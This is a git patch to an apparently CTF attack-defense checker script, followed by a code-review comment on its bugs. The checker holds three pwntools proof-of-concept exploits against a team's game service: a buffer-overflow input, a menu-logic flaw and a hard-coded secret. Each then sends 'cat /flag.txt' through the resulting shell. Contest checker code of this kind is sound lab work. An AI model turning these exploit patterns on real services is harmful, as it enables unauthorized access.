From dc44c91c792241f18b79e5a59229e8c63074ebda Mon Sep 17 00:00:00 2001
From: myitinos
Date: Fri, 11 Oct 2019 22:18:51 +0800
Subject: [PATCH] update
---
 checker.py | 132 ++++++++++++++++++++++++++---------------------------
 1 file changed, 64 insertions(+), 68 deletions(-)
diff --git a/checker.py b/checker.py
index 2ffd3f3..6b1dc47 100644
--- a/checker.py
+++ b/checker.py
@@ -6,99 +6,95 @@ TOTAL_TEAMS = 1 FORMAT = "SlashRootCTF" -def run(): - # return process(FILENAME) - return remote("127.0.0.1", 60204) +def poc0(host, port): + with remote(host, port) as p: + p.recvuntil(">") + p.sendline(("A" * 32) + ("\x11\x11\x11\x11\x11\x11\x11\x11\x01")) + msg = p.recvuntil(">") + # print(msg) + if "young" in msg: + p.sendline("y") + p.recvuntil(">") + p.sendline("2") + p.recvuntil(">") + p.sendline("4") + p.recvuntil(">") + p.sendline("y") + for _ in xrange(10): + p.recvuntil(">") + p.sendline("99") + p.sendline("cat /flag.txt") + flag = p.recvuntil("}") + # print flag + if FORMAT in flag: + return True + else: + return False + else: + return False -def poc0(host, port): - p = remote(host, port) - p.recvuntil(">") - p.sendline(("A" * 32) + ("\x11\x11\x11\x11\x11\x11\x11\x11\x01")) - msg = p.recvuntil(">") - # print(msg) - if "young" in msg: - p.sendline("y") +def poc1(host, port): + with remote(host, port) as p: p.recvuntil(">") - p.sendline("2") + p.sendline("Leo") + p.recvuntil(">") + p.sendline("y") + for _ in range(2): + p.recvuntil(">") + p.sendline("3") + p.recvuntil(">") + p.sendline("0") + if "Who" in p.recvuntil(">"): + return False + p.sendline("y") + p.recvuntil(">") + p.sendline("1") p.recvuntil(">") p.sendline("4") p.recvuntil(">") p.sendline("y") - for _ in xrange(10): + for _ in range(10): p.recvuntil(">") p.sendline("99") p.sendline("cat /flag.txt") flag = p.recvuntil("}") - # print flag if FORMAT in flag: return True else: return False - else: - return False - - -def poc1(host, port): - p = remote(host, port) - p.recvuntil(">") - p.sendline("Leo") - p.recvuntil(">") - p.sendline("y") - for _ in range(2): - p.recvuntil(">") - p.sendline("3") - p.recvuntil(">") - p.sendline("0") - if "Who" in p.recvuntil(">"): - return False - p.sendline("y") - p.recvuntil(">") - p.sendline("1") - p.recvuntil(">") - p.sendline("4") - p.recvuntil(">") - p.sendline("y") - for _ in range(10): - p.recvuntil(">") - p.sendline("99") - p.sendline("cat 
/flag.txt") - flag = p.recvuntil("}") - if FORMAT in flag: - return True - else: - return False def poc2(host, port): - p = remote(host, port) - p.recvuntil(">") - p.sendline("__th3_w0rLd_D3str0Y3r_15_b4ck__") - p.recvuntil(">") - p.sendline("y") - p.recvuntil(">") - p.sendline("6") - if "Lv: 1000000" in p.recvuntil(">"): - p.sendline("2") + with remote(host, port) as p: p.recvuntil(">") - p.sendline("4") + p.sendline("__th3_w0rLd_D3str0Y3r_15_b4ck__") p.recvuntil(">") p.sendline("y") - for _ in xrange(10): + p.recvuntil(">") + p.sendline("6") + if "Lv: 1000000" in p.recvuntil(">"): + p.sendline("2") p.recvuntil(">") - p.sendline("99") - p.sendline("cat /flag.txt") - flag = p.recvuntil("}") - if FORMAT in flag: - return True + p.sendline("4") + p.recvuntil(">") + p.sendline("y") + for _ in xrange(10): + p.recvuntil(">") + p.sendline("99") + p.sendline("cat /flag.txt") + flag = p.recvuntil("}") + if FORMAT in flag: + return True + else: + return False else: return False - else: - return False if __name__ == "__main__": for i in range(1, TOTAL_TEAMS+1): - print poc0(HOST, (60004 + (i*100))) - print poc1(HOST, (60004 + (i*100))) - print poc2(HOST, (60004 + (i*100))) + r0 = poc0(HOST, (60004 + (i*100))) + r1 = poc1(HOST, (60004 + (i*100))) + r2 = poc2(HOST, (60004 + (i*100))) + print("Team [{}] {} {} {}" % (i, r0, r1, r2))
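Review bot: The new summary line at the end of the `__main__` loop mixes `str.format` placeholders with the `%` operator, so `"Team [{}] {} {} {}" % (i, r0, r1, r2)` raises `TypeError` (not all arguments converted) on the first team and no result is printed; it should be `print("Team [{}] {} {} {}".format(i, r0, r1, r2))`. Separately, the `with remote(...)` blocks now close the socket, but none of the `recvuntil` calls visible here passes a timeout or sits inside exception handling. A service that is down or stalls would therefore presumably abort or hang the whole run instead of scoring that team as `False`; catching the connection/EOF error in each PoC and returning `False` would keep the checker going. `poc0` and `poc2` also still use `xrange` while `poc1` uses `range`, which ties the file to Python 2.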